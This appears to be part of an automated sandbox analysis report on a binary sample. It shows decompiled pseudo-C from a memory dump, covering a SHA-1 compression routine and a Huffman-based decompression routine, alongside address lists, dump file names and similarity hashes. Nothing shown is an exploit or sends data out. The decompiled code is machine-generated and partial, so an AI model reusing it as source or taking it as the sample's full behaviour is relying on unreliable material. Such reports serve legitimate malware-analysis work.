					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x0019e973
0x0019e97f
0x0019e98b
0x0019e995
0x0019e99a
0x0019e99f
0x0019e981
0x0019e981
0x0019e985
0x0019e985
0x0019e9a2
0x0019e9ab
0x0019e9ad
0x0019e9b0
0x0019e9ba
0x0019e9c0
0x0019e9c4
0x0019e9dc
0x0019e9e7
0x0019e9e9
0x0019e9eb
0x0019e9f0
0x0019e9f3
0x0019e9f7
0x0019e9fb
0x0019e9fe
0x0019ea09
0x0019ea0e
0x0019ea28
0x0019ea2d
0x0019ea38
0x0019ea45
0x0019ea4a
0x0019ea5e
0x0019ea65
0x0019ea6f
0x0019ea7c
0x0019ea85
0x0019ea95
0x0019eaa1
0x0019eaa3
0x0019eaae
0x0019eab3
0x0019eab6
0x0019eaca
0x0019ead1
0x0019ead8
0x0019eae1
0x0019eae5
0x0019eae9
0x0019eaf4
0x0019eaf7
0x0019eafa
0x0019eb06
0x0019eb18
0x0019eb1b
0x0019eb1d
0x0019eb33
0x0019eb3b
0x0019eb3f
0x0019eb4a
0x0019eb5c
0x0019eb63
0x0019eb66
0x0019eb6c
0x0019eb6e
0x0019eb73
0x0019eb78
0x0019eb8e
0x0019eb97
0x0019eb99
0x0019eb9c
0x0019eba2
0x0019eba8
0x0019ebb7
0x0019ebc7
0x0019ebc9
0x0019ebcf
0x0019ebd1
0x0019ebd7
0x0019ebdc
0x0019ebe0
0x0019ebe6
0x0019ebea
0x0019ebf4
0x0019ebfb
0x0019ec00
0x0019ec01
0x0019ec05
0x0019ec09
0x0019ec0d
0x0019ec0d
0x0019ec0d
0x0019ec12
0x0019ec16
0x0019ec1e
0x0019ec24
0x0019ec27
0x0019ec2a
0x0019ec39
0x0019ec48
0x0019ec4a
0x0019ec4d
0x0019ec53
0x0019ec5d
0x0019ec62
0x0019ec68
0x0019ec6c
0x0019ec70
0x0019ec74
0x0019ec78
0x0019ec7d
0x0019ec90
0x0019ec9f
0x0019eca1
0x0019eca4
0x0019ecaa
0x0019ecaf
0x0019ecc2
0x0019ecc8
0x0019eccc
0x0019ecdc
0x0019ece5
0x0019ecef
0x0019ecf2
0x0019ecf4
0x0019ecfb
0x0019ed01
0x0019ed10
0x0019ed1d
0x0019ed23
0x0019ed2b
0x0019ed4c
0x0019ed4f
0x0019ed56
0x0019ed5a
0x0019ed5d
0x0019ed67
0x0019ed77
0x0019ed7c
0x0019ed84
0x0019ed9b
0x0019eda2
0x0019eda6
0x0019eda8
0x0019edab
0x0019edb1
0x0019edba
0x0019edca
0x0019edcf
0x0019edd6
0x0019edda
0x0019edde
0x0019ede9
0x0019edea
0x0019edf4
0x0019edf4
0x0019edf4
0x0019edf7
0x0019edfa
0x0019ee01
0x0019ee06
0x0019ee0b
0x0019ee12
0x0019ee20
0x0019ee2f
0x0019ee31
0x0019ee37
0x0019ee46
0x0019ee49
0x0019ee4c
0x0019ee4d
0x0019ee59
0x0019ee5d
0x0019ee67
0x0019ee69
0x0019ee70
0x0019ee80
0x0019ee89
0x0019ee8b
0x0019ee8e
0x0019ee9a
0x0019eea2
0x0019eea9
0x0019eeac
0x0019eeb0
0x0019eeb6
0x0019eebc
0x0019eec0
0x0019eed0
0x0019eedf
0x0019eee2
0x0019eee4
0x0019eee7
0x0019ef0b
0x0019ef14
0x0019ef17
0x0019ef19
0x0019ef1d
0x0019ef27
0x0019ef2e
0x0019ef44
0x0019ef4e
0x0019ef50
0x0019ef54
0x0019ef62
0x0019ef71
0x0019ef79
0x0019ef7e
0x0019ef85
0x0019ef9e
0x0019efa4
0x0019efa6
0x0019efaa
0x0019efb0
0x0019efb8
0x0019efbd
0x0019efcd
0x0019efd3
0x0019efd7
0x0019efe1
0x00000000
0x00000000
0x0019edf0
0x0019edf0
0x0019efe9
0x0019efea
0x0019efee
0x0019efee
0x0019efee
0x0019eff3
0x0019eff7
0x0019effc
0x0019f001
0x0019f006
0x0019f008
0x0019f00a
0x0019f00e
0x0019f01d
0x0019f02c
0x0019f02e
0x0019f031
0x0019f039
0x0019f03e
0x0019f047
0x0019f04d
0x0019f051
0x0019f055
0x0019f05c
0x0019f05e
0x0019f071
0x0019f080
0x0019f082
0x0019f085
0x0019f08d
0x0019f0a0
0x0019f0a4
0x0019f0a8
0x0019f0ab
0x0019f0bb
0x0019f0c4
0x0019f0ce
0x0019f0d1
0x0019f0d3
0x0019f0da
0x0019f0de
0x0019f0f3
0x0019f0fc
0x0019f100
0x0019f104
0x0019f129
0x0019f132
0x0019f135
0x0019f137
0x0019f13a
0x0019f148
0x0019f155
0x0019f172
0x0019f175
0x0019f179
0x0019f17b
0x0019f17e
0x0019f184
0x0019f18c
0x0019f195
0x0019f199
0x0019f1a2
0x0019f1a6
0x0019f1a8
0x0019f1af
0x0019f1b3
0x0019f1bc
0x0019f1c0
0x0019f1c3
0x0019f1c6
0x0019f1c9
0x0019f1cb
0x0019f1d5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
Instruction ID: 0d9769aaf769b8c77f0036460832d05e0530db13dc8afdf41036f16639617446
Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
Instruction Fuzzy Hash: D75248B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001A66A2, Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E001A66A2(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x34);
				 *(_t455 + 0x14) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x14) = _t201;
						 *(_t455 + 0x10) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x3c) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E001B2B5E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00196D3A(0x1d00e0);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x24) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E0019A4ED(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E0019A4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E0019A4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E001A3564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E0019A4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E0019A4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E001A7D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E001A7D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E0019A4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
